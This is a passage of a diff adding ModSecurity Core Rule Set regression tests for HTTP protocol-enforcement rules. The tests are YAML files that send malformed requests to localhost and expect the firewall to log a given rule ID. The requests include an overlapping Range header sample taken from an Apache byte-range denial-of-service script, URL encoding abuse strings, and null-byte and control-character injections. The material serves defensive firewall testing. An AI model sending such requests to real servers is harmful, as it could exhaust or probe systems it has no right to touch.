log_contains: id "920180"
-
test_title: 920180-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920180"
-
test_title: 920180-3
desc: POST request missing Content-Length Header (920180) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920180"
-
test_title: 920180-4
desc: Ignore check of CT header if protocol is HTTP/2
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/2.0
output:
no_log_contains: id "920180"

35
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml Executable file
View File

@@ -0,0 +1,35 @@
---
meta:
author: "fgsch"
enabled: true
name: "920181.yaml"
description: "Description"
tests:
-
test_title: 920181-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
uri: "/"
headers:
Host: "localhost"
Accept: "*/*"
Content-Length: 7
Content-Type: "application/x-www-form-urlencoded"
Transfer-Encoding: "chunked"
User-Agent: "ModSecurity CRS 3 Tests"
data:
- "7"
- "foo=bar"
- "0"
- ""
- ""
stop_magic: true
output:
# Apache unsets the Content-Length header if
# Transfer-Encoding is found!
no_log_contains: id "920181"

48
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml Normal file
View File

@@ -0,0 +1,48 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920190.yaml"
description: "Description"
tests:
-
test_title: 920190-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "0-1"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920190"
-
test_title: 920190-2
desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions'
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920190"

170
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml Normal file
View File

@@ -0,0 +1,170 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920200.yaml"
description: "Description"
tests:
-
test_title: 920200-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60"
output:
log_contains: "id \"920200\""
-
# Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php
test_title: 920200-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11"
output:
log_contains: "id \"920200\""
-
test_title: 920200-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50"
output:
no_log_contains: "id \"920200\""
-
test_title: 920200-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=-10,-, 21-30,31-40,41-50,51-500,"
output:
log_contains: "id \"920200\""
-
test_title: 920200-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500"
output:
log_contains: "id \"920200\""
-
test_title: 920200-6
desc: 'Range: Too many fields (920200) from old modsec regressions'
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920200"
-
test_title: 920200-7
desc: This should PASS (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
no_log_contains: id "920200"
-
test_title: 920200-8
desc: "This should FAIL with rule 920200 (PL2)"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
log_contains: id "920200"
-
test_title: 920200-9
desc: This should PASS (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"
-
test_title: 920200-10
desc: This should PASS (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"

24
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml Normal file
View File

@@ -0,0 +1,24 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920201.yaml"
description: "Tests for 920201"
tests:
-
test_title: 920201-1
desc: This should FAIL with rule 920201 (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920201"

24
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml Normal file
View File

@@ -0,0 +1,24 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920202.yaml"
description: "Tests for 920202"
tests:
-
test_title: 920202-1
desc: This should FAIL with rule 920202 (PL4)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920202"

125
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml Normal file
View File

@@ -0,0 +1,125 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920210.yaml"
description: "Tests that trigger rule 920210"
tests:
-
test_title: 920210-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive"
output:
no_log_contains: "id \"920210\""
-
test_title: 920210-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,keep-alive"
output:
log_contains: "id \"920210\""
-
test_title: 920210-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,close"
output:
log_contains: "id \"920210\""
-
test_title: 920210-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "close,close"
output:
log_contains: "id \"920210\""
-
test_title: 920210-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "User-Agent"
output:
no_log_contains: "id \"920210\""
-
test_title: 920210-6
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: keep-alive, keep-alive
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"
-
test_title: 920210-7
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close, close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"

82
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml Normal file
View File

@@ -0,0 +1,82 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920220.yaml"
description: "Tests to trigger rule 920220"
tests:
-
# This gets a percent but not a number after, invalid
test_title: 920220-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=%w20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
-
# We have a valid percent encoding here
test_title: 920220-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=xyz%20%99"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
-
# url encoding includes spaces as plusses, this is valid
test_title: 920220-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=This+is+a+test"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
-
# testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
-
# testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%1G"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""

47
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml Normal file
View File

@@ -0,0 +1,47 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920230.yaml"
description: "Description"
tests:
-
# From old modsec regression tests
test_title: 920230-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920230\""
-
# From old modsec regression tests
test_title: 920230-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
no_log_contains: "id \"920230\""

136
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml Normal file
View File

@@ -0,0 +1,136 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920240.yaml"
description: "Description"
tests:
-
test_title: 920240-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 11
data: "x=new %w20$"
stop_magic: true
output:
log_contains: "id \"920240\""
-
test_title: 920240-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN This should Trigger"
Host: "localhost%00"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 10
data: "x=new %20$"
stop_magic: true
output:
no_log_contains: "id \"920240\""
-
test_title: 920240-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "param=value"
output:
no_log_contains: "id \"920240\""
-
# We have a valid percent encoding here
test_title: 920240-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "text/xml"
data:
- "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">"
- " <SOAP-ENV:Body>"
- " <xkms:StatusRequest xmlns:xkms=\"http://www.w3.org/2002/03/xkms#\" Id=\"_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659\" ResponseId=\"_c1c36b3f-f962-4aea-bfbd-07ed58468c9b\" Service=\"http://www.soapclient.com/xml/xkms2\">"
- " <xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism>"
- " <xkms:RespondWith>%1Gwww.attack.org</xkms:RespondWith>"
- " </xkms:StatusRequest>"
- " </SOAP-ENV:Body>"
- "</SOAP-ENV:Envelope>"
output:
no_log_contains: "id \"920240\""
-
# test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "9"
data: "param=%1G"
stop_magic: true
output:
log_contains: "id \"920240\""
-
# test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
output:
log_contains: "id \"920240\""

68
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml Normal file
View File

@@ -0,0 +1,68 @@
---
meta:
author: "csanders-git"
enabled: false
name: "920250.yaml"
description: "Description"
tests:
-
# crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set
# Taken from existing modsec regression
test_title: 920250-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0%af"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
-
# Taken from existing modsec regression
test_title: 920250-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
-
# Taken from existing modsec regression
test_title: 920250-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%F5%80%BF%BF"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""

56
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml Normal file
View File

@@ -0,0 +1,56 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920260.yaml"
description: "Description"
tests:
-
test_title: 920260-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%uff0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920260\""
-
test_title: 920260-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%u0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920260\""
-
# Test taken from existing modsec regression
test_title: 920260-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%uFF01"
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920260\""

143
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml Normal file
View File

@@ -0,0 +1,143 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920270.yaml"
description: "Description"
tests:
-
test_title: 920270-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
-
test_title: 920270-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
-
test_title: 920270-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
-
# This causes apache to error before it gets to CRS. Therefore
# we'll mark this as a status 400 now until the FTW OR output is added
test_title: 920270-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%00"
output:
status: [403, 400]
# log_contains: "id \"920270\""
-
test_title: 920270-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Referer: "anything%00"
output:
log_contains: "id \"920270\""
-
test_title: 920270-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%40=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
-
test_title: 920270-7
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
-
test_title: 920270-8
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
-
# Test converted from old tests
test_title: 920270-9
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920270\""

92
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml Normal file
View File

@@ -0,0 +1,92 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920271.yaml"
description: "Description"
tests:
-
test_title: 920271-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%127"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
-
test_title: 920271-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%03"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
-
test_title: 920271-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
-
test_title: 920271-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: hi%13=bye
output:
log_contains: "id \"920271\""
-
test_title: 920271-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%20index.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""
-
test_title: 920271-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%FFindex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""

79
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml Normal file
View File

@@ -0,0 +1,79 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920272.yaml"
description: "Description"
tests:
-
test_title: 920272-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%25"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
-
test_title: 920272-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%80"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
-
test_title: 920272-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=t%FFest1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
-
test_title: 920272-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%35"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920272\""
-
# This will not trigger with Apache because Apache will block with AH00127
#(22)Invalid argument: [client 127.0.0.1:47427] AH00127: Cannot map GET /i%FFndex.html?test=test1 HTTP/1.1 to file. It will return a 404 instead so we accept either.
test_title: 920272-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/i%FFndex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 404]

79
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml Normal file
View File

@@ -0,0 +1,79 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920273.yaml"
description: "Description"
tests:
-
test_title: 920273-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""
-
# the '&' is one of the only symbol allowed
test_title: 920273-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1&test=t"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920273\""
-
test_title: 920273-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
data: "<hello"
output:
log_contains: "id \"920273\""
-
test_title: 920273-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%5FHI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
